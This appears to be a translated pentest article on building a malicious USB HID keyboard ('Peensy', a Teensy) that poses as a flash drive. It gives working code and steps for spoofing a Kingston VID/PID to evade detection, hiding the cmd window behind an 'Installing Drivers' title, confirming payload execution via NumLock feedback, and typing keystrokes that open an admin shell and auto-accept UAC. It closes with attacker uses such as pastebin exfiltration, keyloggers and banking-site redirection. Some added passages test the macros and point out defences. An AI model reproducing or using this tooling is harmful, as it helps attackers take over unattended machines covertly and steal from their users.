Evil USB HID emulator or just Peensy



An interesting attack vector is a device that looks like an ordinary USB flash drive but presents itself to the host as a USB HID keyboard (or mouse). We have more or less learned to find and neutralise autorun.inf on flash drives, but against HID emulators things are still bad.

For those not yet familiar with the topic, I recommend starting with the "Combat HID emulator on Arduino" article on Habr. Here I will not cover installing and configuring the Arduino programming environment; instead I will say a little about more advanced use of Peensy (Pentest + Teensy).

Hardware


The first thing to do is to buy a MicroSD adapter for the Teensy and a DIP switch. The adapter lets Peensy emulate not only a keyboard but also the flash drive itself, and it is far more convenient to keep ready-made scripts on that "flash drive" than to reflash them every time. The DIP switch lets you pick the desired payload in the field, for example switching between the 32-bit and 64-bit versions of a script.

An assembled Peensy looks roughly like this:



Alternatively, you can simply buy a ready-made USB Rubber Ducky.



Hiding Peensy


Some protections have already learned to detect and block Peensy, but they do it by matching the VendorID/ProductID pair, which we can change in the Arduino programming environment.
Open the file \arduino-1.0.1-windows\arduino-1.0.1\hardware\teensy\cores\usb_hid\usb_private.h and replace the corresponding values with those of, say, a Kingston flash drive. Further down the same file, change STR_PRODUCT from "Teensy" to "Kingston DataTraveler 2Gb". After that the only thing that can give Peensy away during driver installation is that Windows installs a composite-device driver instead of the usual mass-storage one. But who pays attention to that? (Note that spoofed IDs only fool controls that key on VID/PID; the device still enumerates with a HID keyboard interface, so a policy that blocks or prompts on newly attached keyboard-class devices is unaffected.)

Most of Peensy's work happens in a cmd window. A few switches make that window far less conspicuous: /T:01 gives it a black background with dark-blue text, mode con shrinks it to 15 columns by 1 line, and the title looks harmless:

cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers" 



Adding feedback


A serious drawback of Teensy-based devices was the huge delay at the start of their operation, needed to give the host time to install the drivers. In the Kautilya framework this initial delay is 25 seconds by default. In 25 seconds the colleague you handed the "flash drive" to can easily copy the "necessary documents" onto it and pull it out. And if the drivers happen to take, say, 30 seconds, Peensy will type its attack script straight into the open Word window instead of a cmd window.

The absence of feedback and the giant delay for driver installation significantly reduced Peensy's effectiveness ... until someone thought of using NumLock for this purpose!

When NumLock is pressed, the host tells the keyboard to light the corresponding LED: it sends the new LED state back in a HID output report to every attached keyboard, including our Teensy, where the core exposes it as keyboard_leds. That makes it usable as a feedback channel in Peensy code.

So we replace the fixed 25-second delay with a check of how the system reacts to Peensy pressing NumLock: tap it repeatedly until the LED state changes, which can only happen once the host's HID driver is up and answering. (As written, the loop has no timeout; if the host never echoes the LED, the device keeps tapping NumLock forever.)

int ledkeys(void)       {return int(keyboard_leds);}   // LED bitmap last received from the host: bit 0 = NumLock, bit 1 = CapsLock, bit 2 = ScrollLock
bool is_num_on(void)    {return (ledkeys() & 1) == 1;}
void wait_for_drivers()
{
    bool numLockTrap = is_num_on();
    while(numLockTrap == is_num_on())  // press NumLock until its state changes, i.e. until the host's HID driver is up
    {
        Keyboard.set_key1(KEY_NUM_LOCK);
        Keyboard.send_now();        // NumLock pressed
        delay(200);
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();        // released
        delay(200);
    }
}

The same mechanism lets us check whether the commands we type are actually executed, for example whether PowerShell is available on the system.
First make sure NumLock is off:

	if (is_num_on())                 
	{
		delay(500);
		Keyboard.set_key1(KEY_NUM_LOCK);
		Keyboard.send_now();
		delay(700);
		Keyboard.set_modifier(0);
		Keyboard.set_key1(0);
		Keyboard.send_now();
		delay(500);
	}

Then toggle it back on from inside the command window (a cmd window must be open and focused). The article's snippet does this with a small VBScript run through cscript, so as written it really proves that typed commands execute rather than that PowerShell is present; the same NumLock toggle issued from PowerShell would test that specifically:

Keyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{NUMLOCK}\" > numlock.vbs");  // write a one-line VBScript that presses NumLock
delay(400);
Keyboard.println("cscript numlock.vbs");   // run it: if the window has focus and cscript works, the LED flips
delay(400);

Now all that remains is to read NumLock with is_num_on() to find out whether the script ran.

Checks via NumLock (and likewise CapsLock and ScrollLock) can be inserted anywhere in Peensy code: for example, to find out whether the user has taken the focus away from the cmd window, whether a script completed correctly, and so on.
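As an added example (not code from the article or from Kautilya), here is the NumLock handshake and the "did my command actually run?" probe modelled in plain C++ against a fake host, so the logic can be unit-tested on a PC before it goes onto the device. It adds the tap limit the page's loop lacks. The HidLink interface, FakeHost and the constants are this example's own assumptions; on a real Teensy the HidLink methods would wrap Keyboard.set_key1()/Keyboard.send_now() and read keyboard_leds from the page's snippets.

```cpp
// Added example, not Peensy/Kautilya code: the NumLock feedback handshake and
// the "did my command actually run?" probe, written against a small HidLink
// interface so the logic can be exercised on a PC with a fake host. On a real
// Teensy, HidLink would wrap Keyboard.set_key1()/Keyboard.send_now() and read
// keyboard_leds (assumption: same core API as the page's snippets).
#include <cstdint>
#include <cstdio>
#include <functional>

// Host -> keyboard LED report bits, as the Teensy core exposes them in keyboard_leds.
enum : uint8_t { LED_NUM = 1 << 0, LED_CAPS = 1 << 1, LED_SCROLL = 1 << 2 };
constexpr uint8_t KEY_NUM_LOCK = 83;   // USB HID usage ID 0x53 (Teensy's KEY_NUM_LOCK)

struct HidLink {
    virtual ~HidLink() = default;
    virtual void tap(uint8_t key) = 0;       // press and release a single key
    virtual uint8_t leds() = 0;              // last LED bitmap received from the host
    virtual void sleep_ms(uint32_t ms) = 0;  // delay()
};

// Fake host: drops keystrokes until its HID driver is "installed" (ready_ms of
// uptime); afterwards it answers every NumLock tap by flipping the LED bit.
struct FakeHost : HidLink {
    uint32_t now_ms = 0;
    uint32_t ready_ms;
    uint8_t led = 0;
    explicit FakeHost(uint32_t ready) : ready_ms(ready) {}
    void tap(uint8_t key) override {
        if (now_ms >= ready_ms && key == KEY_NUM_LOCK) led ^= LED_NUM;
    }
    uint8_t leds() override { return led; }
    void sleep_ms(uint32_t ms) override { now_ms += ms; }
    // A command typed into the cmd window that toggles NumLock (like the page's
    // numlock.vbs): it only runs if the window still has keyboard focus.
    void typed_numlock_command(bool window_focused) { if (window_focused) led ^= LED_NUM; }
};

bool is_num_on(HidLink& link) { return (link.leds() & LED_NUM) != 0; }

// Tap NumLock until the host echoes the change back in the LED report. Unlike
// the page's loop this gives up after max_taps; returns taps needed, 0 on timeout.
unsigned wait_for_drivers(HidLink& link, unsigned max_taps = 100) {
    const bool before = is_num_on(link);
    for (unsigned n = 1; n <= max_taps; ++n) {
        link.tap(KEY_NUM_LOCK);
        link.sleep_ms(400);          // 200 ms pressed + 200 ms released, as on the page
        if (is_num_on(link) != before) return n;
    }
    return 0;
}

// Bring NumLock to a known (off) state before using it as a probe.
void ensure_num_off(HidLink& link) {
    if (is_num_on(link)) { link.tap(KEY_NUM_LOCK); link.sleep_ms(500); }
}

// Generic success check: type a command that is expected to toggle NumLock,
// then read the LED. A false result means the command never ran, e.g. because
// the user clicked away from the cmd window.
bool payload_ran(HidLink& link, const std::function<void()>& type_command) {
    ensure_num_off(link);
    type_command();
    link.sleep_ms(400);
    return is_num_on(link);
}

// Scenario helpers used by main() below (and by tests).
unsigned taps_until_ready(uint32_t driver_ready_ms) {
    FakeHost host(driver_ready_ms);
    return wait_for_drivers(host);
}
bool probe_typed_command(bool window_focused) {
    FakeHost host(0);
    return payload_ran(host, [&] { host.typed_numlock_command(window_focused); });
}

int main() {
    std::printf("driver ready after 30 s: %u taps\n", taps_until_ready(30000));  // 76
    std::printf("driver never ready:      %u taps (0 = timeout)\n", taps_until_ready(60000));
    std::printf("command ran with focus:  %d, without focus: %d\n",
                probe_typed_command(true), probe_typed_command(false));
    return 0;
}
```

With a host whose driver takes 30 s, the handshake returns after 76 taps (about 30.4 s) instead of a blind 25 s wait; a host that never answers hits the tap limit and the sketch can fall back to a safe behaviour instead of typing into whatever window is open.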

Run the command line with administrator privileges


To open a command prompt with administrator privileges you press WinKey, type "cmd", press Ctrl+Shift+Enter, and in the UAC prompt that appears press Left (to move the focus to "Yes") and then Enter.

In Peensy code, it will look like this:

  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();                     // press WinKey
  delay(400);
  Keyboard.set_modifier(0);
  Keyboard.send_now();                     // release it
  delay(100);
  Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");  // type the cmd command line
  delay(400);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();             // Ctrl+Shift+Enter: open cmd with admin rights
  delay(400);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();              // release Ctrl+Shift+Enter
  delay(400);
  Keyboard.set_key1(KEY_LEFT);
  Keyboard.send_now();            // Left: move the focus to "Yes" in the UAC prompt
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();            // Enter: confirm
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();


This sequence takes about 2 seconds; you can try to trim it down to 1.
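An added example, not the article's own code: the same admin-cmd launch expressed as a macro that records the HID boot-keyboard report pairs it would send and its total delay budget, so a keystroke script can be checked on a PC for stuck modifiers and timing before it is plugged into a target. The Macro and Report types are this example's own; the modifier bit values and key usage IDs are assumed to be those of the Teensy core headers.

```cpp
// Added example, not Peensy/Kautilya code: records the HID boot-keyboard reports
// a Teensy would send for the page's "run cmd as administrator" sequence so the
// macro can be sanity-checked on a PC before it is plugged into a target.
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Teensy core values (assumed here): modifier bits of report byte 0 and USB HID usage IDs.
constexpr uint8_t MOD_CTRL = 0x01, MOD_SHIFT = 0x02, MOD_RIGHT_GUI = 0x80;
constexpr uint8_t KEY_ENTER = 40, KEY_LEFT = 80;

// Bytes 0 (modifiers) and 2 (first key) of the 8-byte boot-keyboard report;
// byte 1 is reserved and bytes 3..7 carry up to five more keys, unused here.
struct Report { uint8_t modifier; uint8_t key; };

struct Macro {
    std::vector<Report> reports;   // one entry per send_now(), in order
    std::string typed;             // text passed to Keyboard.print()
    uint32_t delay_ms = 0;         // sum of all delay() calls

    Macro& hold(uint8_t mod, uint8_t key) { reports.push_back({mod, key}); return *this; } // send_now() with keys down
    Macro& release() { reports.push_back({0, 0}); return *this; }                          // all-zero report
    Macro& wait(uint32_t ms) { delay_ms += ms; return *this; }
    Macro& type(const std::string& s) { typed += s; return *this; }
    Macro& chord(uint8_t mod, uint8_t key, uint32_t hold_ms) { return hold(mod, key).wait(hold_ms).release(); }

    // A macro that ends with a key or modifier still down leaves the target with a
    // stuck key: the classic HID-script failure, so check for it before deploying.
    bool all_released() const {
        return reports.empty() || (reports.back().modifier == 0 && reports.back().key == 0);
    }
};

// The page's sequence: WinKey, type the command, Ctrl+Shift+Enter, then Left and Enter in the UAC prompt.
Macro admin_cmd(const std::string& cmdline) {
    Macro m;
    m.chord(MOD_RIGHT_GUI, 0, 400).wait(100)                // WinKey opens the Start menu search box
     .type(cmdline).wait(400)                              // Keyboard.print(cmdline)
     .hold(MOD_CTRL, 0).hold(MOD_CTRL | MOD_SHIFT, 0)      // modifiers first, as on the page ...
     .hold(MOD_CTRL | MOD_SHIFT, KEY_ENTER).wait(400)      // ... then Enter: "run as administrator"
     .release().wait(400)
     .chord(0, KEY_LEFT, 100)                              // UAC prompt: move the focus to "Yes"
     .chord(0, KEY_ENTER, 100);                            // confirm
    return m;
}

int main() {
    Macro m = admin_cmd("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");
    std::printf("%zu reports, %u ms of delays, all released: %s\n",
                m.reports.size(), m.delay_ms, m.all_released() ? "yes" : "no");
    for (const Report& r : m.reports) std::printf("  mod=0x%02x key=%u\n", r.modifier, r.key);
    return 0;
}
```

The recorded sequence is also what a defender sees in a USB capture of such a device: a Win chord, a burst of typed characters, and a Ctrl+Shift+Enter chord, all inside two seconds.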

Most Peensy payloads need administrator rights, but there are some interesting scripts (for example, a keylogger that sends all keystrokes to pastebin) that run quietly with ordinary user rights.

If Habr readers are interested in this topic, I will go through a few interesting scripts in the following articles. In the meantime, the scripts can be downloaded and studied independently from the blog of Kautilya's author, Nikhil Mittal.

Conclusion


Peensy's range of capabilities grows every day. On a fast modern computer Peensy can deliver its payload in a matter of seconds, quietly enough to go unnoticed by most PC users.

Feedback through the NumLock and/or ScrollLock keys makes it possible to build adaptive and fault-tolerant payloads, and using PowerShell greatly expands what an attacker can do.

With PowerShell you can, for example:
- send system information or the contents of a given file to pastebin.com through a hidden Internet Explorer window;
- change the DNS server (which lets you control the user's Internet activity);
- download and run an executable;
- edit the HOSTS file (to redirect web pages, for example an online-banking site);
- enable RDP and configure it for the attacker's connection;
- install a script keylogger or sniffer;
- bring up a Wi-Fi access point with given parameters, etc.

Here is a short demonstration of Teensy at work on a real machine, with a payload that launches Notepad with admin rights.


